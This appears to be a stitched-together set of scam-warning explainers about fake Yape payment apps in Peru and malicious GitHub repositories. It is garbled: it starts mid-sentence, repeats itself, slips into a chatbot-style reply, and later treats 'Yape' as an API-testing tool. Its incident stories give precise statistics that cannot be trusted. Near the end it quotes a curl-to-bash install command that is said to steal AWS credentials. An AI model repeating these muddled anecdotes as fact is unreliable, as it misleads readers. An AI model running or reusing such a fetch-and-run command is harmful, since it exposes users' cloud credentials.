digital wallet (a popular payment app in Peru) are hosted on to deceive merchants and users

What is the "Fake Yape" Scam?
The scam involves a modified application—often distributed as an APK—that mimics the visual interface of the official Yape app.
Visual Mimicry: The fake app generates a "payment successful" screen that looks identical to the real one, including animations like the signature "serpentine" confetti.
Dynamic Data: Scammers scan a merchant's real QR code to pull the recipient's name, then manually enter it and any amount into the fake app to create a convincing but fraudulent proof of payment.
Zero Funds: No money is actually moved; the app simply acts as a visual simulator to trick sellers into handing over goods.

Why GitHub is Used
GitHub is often exploited in these schemes because it provides a veneer of legitimacy.
Hosting APKs: Attackers host the malicious APK files in public repositories, sometimes using "fake stars" and fake comments to make the project look popular or trustworthy.
Technical Credibility: Hosting code on a platform for developers can trick victims into thinking they are downloading a "modded" or "enhanced" version of the app for legitimate use, when it is actually a tool for fraud.
Detection Evasion: Scammers frequently rotate repositories or obfuscate the code to avoid being flagged by GitHub's moderation teams.

How to Protect Yourself
To avoid falling victim to these scams, follow these security practices:

Fake Yape applications (Yape is a popular digital payment app in Peru) are fraudulent tools used by scammers to generate realistic-looking fake payment receipts.

⚠️ Warning Regarding GitHub Links
Violations & Takedowns: Codebases created to generate fake Yape invoices violate GitHub's terms of service. Known repositories, such as those by developers like "acidcoolffc", have been removed by the platform.
Malware Risks: Many unofficial third-party applications distributed via public platforms or unverified sites carry massive security risks, including identity theft, credential harvesting, or malware.

🔍 How the "Fake Yape" Scam Works
Visual Simulation: Scammers use unauthorized web templates or clone apps that perfectly mimic the official Yape interface.
Fake Invoices: They input the merchant's phone number and name to generate a visually identical success receipt.
No Real Funds: They show this screen to business owners or send the fake image over WhatsApp to pretend they paid. No money ever enters the merchant's actual bank account.

🛡️ How to Protect Your Business
Verify Your Balance: Never trust a screenshot or a customer's phone display. Always look directly at the notifications or balance in your own official Yape or bank application.
Do Not Sideload: Avoid downloading custom .apk files or codes promising simulated interfaces. Only use the official app from authorized stores like Google Play and Apple's App Store.

Don’t Be Fooled: The "Fake Yape" Scam and GitHub Phishing Risks
If you’re a user of the popular Peruvian digital wallet Yape, you may have heard about a rising tide of scams designed to trick you out of your hard-earned money. Beyond traditional phishing, a new wave of "fake link" scams—some even hosted or disguised using platforms like GitHub—is targeting unsuspecting users.

What is the "Fake Yape" Scam?
The "Fake Yape" isn't a single link, but rather a counterfeit application or interface that mimics the look and feel of the real Yape app by Banco de Crédito del Perú (BCP). Scammers often use these fake versions to:
Generate Fake Proof of Payment: Sellers in marketplaces are often shown a screen that looks identical to a successful Yape transfer notification, but no money ever enters their account.
Phish Credentials: Fake links sent via SMS or WhatsApp lead to login pages designed to steal your Yape or banking credentials.

The GitHub Connection: Why Scammers Use It
You might wonder why a "GitHub link" would be involved in a banking scam. Bad actors use GitHub for several deceptive reasons:
Borrowing Authority: GitHub is a reputable platform. Seeing github.com in a link can lower a user's guard compared to a random, sketchy URL.
Hosting Malicious Code: Attackers often host "dual-use" tools or malicious scripts on GitHub that can be used to build phishing pages or automate credential theft.
Phishing Repository Confusion: Scammers create repositories with names similar to popular tools, hoping developers or tech-savvy users will download "fake" versions of legitimate software that contain backdoors.

How to Protect Yourself
To avoid falling for "Fake Yape" scams or malicious GitHub phishing links, keep these tips in mind:
Trust Your Notifications, Not Screenshots: If you are a merchant, never rely on a screenshot or the customer's phone screen. Always check your own "Last Movements" (Últimos movimientos) in your official Yape app to confirm the money has actually arrived.
Check the URL: Before clicking or entering any info, verify the domain. Official GitHub links will always be on github.com or gist.github.com, but remember that just because it is on GitHub doesn't mean the
Enable Security Features: Enable Two-Factor Authentication (2FA) on both your banking apps and your GitHub account to prevent unauthorized access even if your password is stolen.
Verify Open Source Projects: If you're downloading code from a repository, check the history, the number of contributors, and any open issues that might mention security risks. Do not run any downloaded files or commands from the repo.
For more tips on staying safe with digital payments, you can check out Credicorp’s latest sustainability reports regarding the growth and security of the Yape ecosystem.
It sounds like you’re reporting a fake GitHub link associated with the name "yape" (possibly referring to Yape, the Peruvian digital wallet app).
If you've encountered a suspicious GitHub repository or a phishing link pretending to be related to Yape, here’s what you should do:
In early 2025, a repository named Yape-MultiTool-v2 went viral on Telegram groups. It had a convincing README with screenshots of a Python script "bypassing" the Yape API.
Thousands downloaded the yape_setup.msi file. Within 24 hours, cybersecurity firm ESET reported a 400% spike in BCP credential theft in Peru. The malware was identified as a variant of Lumma Stealer. Victims reported that after running the tool, their Yape accounts were emptied within minutes, and scammers even changed their linked email addresses.
Law enforcement traced the fake GitHub link back to a ring operating out of Callao, but the money—and the GitHub accounts—were long gone.
Issues → New issue → choose Report abuse (or use GitHub’s report form).

In the ecosystem of software pirating and "cracking," convenience is often the enemy of security. A recent wave of malware distribution has been observed targeting users searching for software cracks, specifically leveraging the name "Yape" and fake GitHub repositories to infect victims.
If you have been searching for a "Yape crack" or a "Yape activator" and landed on a GitHub link that looks slightly off, you may have been targeted.
Here is everything you need to know about how this scam works and how to protect yourself.
A developer saw a tweet: “Check out Yape – faster than Postman for API testing 🔥 github.com/yape-app/yape”
The repo looked legit. The README said:

    curl -sSL https://raw.githubusercontent.com/yape-app/yape/install.sh | bash

That script downloaded an encrypted binary that stole AWS keys from ~/.aws/credentials.